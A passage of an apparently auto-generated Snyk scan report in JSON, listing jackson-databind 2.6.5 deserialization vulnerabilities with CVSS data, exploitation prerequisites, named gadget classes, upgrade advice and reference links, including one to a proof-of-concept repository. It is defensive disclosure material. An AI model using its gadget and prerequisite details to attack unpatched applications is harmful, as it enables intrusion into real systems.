created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11113" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9vvp-fxw6-jcxr" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T08:36:41.369827Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.400473Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2664", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.628835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11111" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-v3xw-c963-f5hc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:28:18.821103Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.145935Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", + "title": "GItHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2666", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:03.656527Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11112" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-58pp-9c76-5625" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:29:29.728517Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.113524Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2682", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.162608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92404", + "probability": "0.04399", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11620" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h4rc-386g-6m85" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:55:38.169333Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:23Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:17.073265Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2680", + "title": "GitHub Issues" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.933985Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92902", + "probability": "0.05021", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11619" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-27xj-rqx5-2255" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:59:04.995807Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.585105Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "XuYuanzhen" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + 